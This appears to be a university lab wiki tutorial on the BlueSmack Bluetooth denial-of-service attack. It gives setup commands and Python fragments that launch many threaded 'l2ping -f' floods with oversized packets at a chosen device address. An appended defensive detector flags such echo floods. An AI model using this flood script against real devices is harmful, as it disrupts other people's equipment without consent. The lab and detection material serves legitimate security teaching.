Bluetooth BlueSmack Attack

From Embedded Lab Vienna for IoT & Security


BlueSmack is a Bluetooth-based Denial-of-Service (DoS) attack, in which the victim device is flooded with a high volume of oversized or malformed echo packets with the intent of causing it to crash or become unresponsive.


  • A Bluetooth-enabled Linux computer to perform the attack
  • A susceptible Bluetooth device
  • A Bluetooth-enabled device to monitor if the attack worked

For the execution of this attack, a Kali Linux VM, a JBL GO Speaker, and an Android Smartphone were used.


Step 1 - Installing Prerequisites

Make sure Python is installed:

sudo apt update
sudo apt install python3

You must have "l2ping" and "hcitool" installed. They are installed by default on Kali Linux. Both are part of the bluez package, so if you are not using Kali, run the following command:

sudo apt install bluez

Step 2 - Activate your Bluetooth Interface

"hciconfig -a" shows information about your Bluetooth interface, including its address and identifier. The identifier, which is probably either hci0 or hci1, is needed for the second command, which brings the interface up.

hciconfig -a

This command activates the Bluetooth interface:

sudo hciconfig hci0 up

Step 3 - The DoS attack

The attack script can be cloned using the command below.

sudo git clone

To perform the attack, you have to go to the directory the script was saved to and execute the py file:


When executed, the script will perform an hcitool scan to look for nearby devices and list their addresses. This is to make the next step easier.

The script will ask for three inputs:

  • The victim device address
  • The size of the packages sent
  • The thread count

The first parameter can be taken from the scan the script automatically performs when executed. The package size is set in bytes; for this attack, a size of 600 was used. The thread count determines how many threads are created to attack concurrently; for this attack, 100 were used.

After entering all three parameters, the threads are set up and then the attack is performed.

You can now use a device like a smartphone to check if the attack is working by trying to connect to the victim device. If the attack worked as it should, you are not able to connect to the device anymore.

How it works

The user is prompted for the target device ID or address:

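target_id = input('Target id or mac > ')
try:
    # Treat the input as an index into the list of scanned devices
    target_addr = array[int(target_id)]
except (ValueError, IndexError):
    # Otherwise use the input as the address itself
    target_addr = target_id
if len(target_addr) < 1:
    print('[!] ERROR: Target addr is missing')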

The user is prompted for the package size that will be sent to the target:

try:
    package_size = int(input('Package size > '))
except ValueError:
    print('[!] ERROR: Package size must be an integer')

The user is prompted for the thread count:

try:
    thread_count = int(input('Thread count > '))
except ValueError:
    print('[!] ERROR: Thread count must be an integer')

The number of threads specified by the user is created:

import threading

# Create and start multiple threads for the DOS attack
for i in range(0, thread_count):
    print('[*] Built thread №' + str(i + 1))
    threading.Thread(target=DOS, args=[str(target_addr), str(package_size)]).start()

l2ping is used here to flood the target with packets. The primary purpose of l2ping is to test the connection and latency between two Bluetooth devices. It sends Bluetooth packets to a device and measures the time it takes for the packets to travel to the remote device and back. In the script, the DOS function uses l2ping to perform a Bluetooth DoS attack. The -s option is used to set the size of the ping packets, and the target address is specified as one of the parameters.

import os

# Function for performing the DOS attack using l2ping
def DOS(target_addr, package_size):
    os.system('l2ping -i hci0 -s ' + str(package_size) + ' -f ' + target_addr)
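
Seen from the receiving side, the traffic described above is a burst of large L2CAP Echo Requests from a single peer. The following detector is an added example, not part of the original page or of the attack script; it assumes already reassembled L2CAP frames with the peer address supplied by the capture layer, and the thresholds, function names and sample frames are constructed for illustration.

```python
import struct
from collections import defaultdict, deque

L2CAP_SIGNALING_CID = 0x0001  # ACL-U signalling channel
ECHO_REQUEST = 0x08           # L2CAP signalling command code
MAX_ECHO_PAYLOAD = 64         # assumed threshold: echo data bytes treated as benign
MAX_ECHO_PER_WINDOW = 20      # assumed threshold: echo requests per peer per window
WINDOW_SECONDS = 1.0          # assumed sliding-window length

def echo_request_size(frame: bytes):
    """Echo payload length if the frame's first command is an Echo Request, else None."""
    if len(frame) >= 8:
        length, cid, code, _ident, cmd_len = struct.unpack_from("<HHBBH", frame)
        ok = cid == L2CAP_SIGNALING_CID and code == ECHO_REQUEST
        if ok and length == len(frame) - 4 and cmd_len <= length - 4:
            return cmd_len
    return None  # other traffic, or truncated/inconsistent lengths

class EchoFloodDetector:
    def __init__(self):
        self.recent = defaultdict(deque)  # peer address -> timestamps inside the window

    def observe(self, ts: float, peer: str, frame: bytes):
        """Return the alerts raised by one received frame (empty list if none)."""
        size = echo_request_size(frame)
        if size is None:
            return []
        alerts = []
        if size > MAX_ECHO_PAYLOAD:
            alerts.append(("oversized", peer, size))
        q = self.recent[peer]
        q.append(ts)
        while ts - q[0] > WINDOW_SECONDS:  # drop timestamps that left the window
            q.popleft()
        if len(q) > MAX_ECHO_PER_WINDOW:
            alerts.append(("flood", peer, len(q)))
        return alerts

def sample_frame(ident: int, payload_len: int) -> bytes:
    """Constructed test input: an L2CAP signalling frame holding one Echo Request."""
    cmd = struct.pack("<BBH", ECHO_REQUEST, ident & 0xFF, payload_len) + bytes(payload_len)
    return struct.pack("<HH", len(cmd), L2CAP_SIGNALING_CID) + cmd

def demo():
    det, alerts = EchoFloodDetector(), []
    for i in range(3):    # constructed benign peer: 44-byte echoes, one per second
        alerts += det.observe(float(i), "00:00:5E:00:53:01", sample_frame(i, 44))
    for i in range(100):  # constructed noisy peer: 600-byte echoes every 5 ms
        alerts += det.observe(10 + i * 0.005, "00:00:5E:00:53:02", sample_frame(i, 600))
    return alerts
```

Calling demo() returns no alerts for the first peer and both "oversized" and "flood" alerts for the second, whose 600-byte size matches the value used in the walkthrough above.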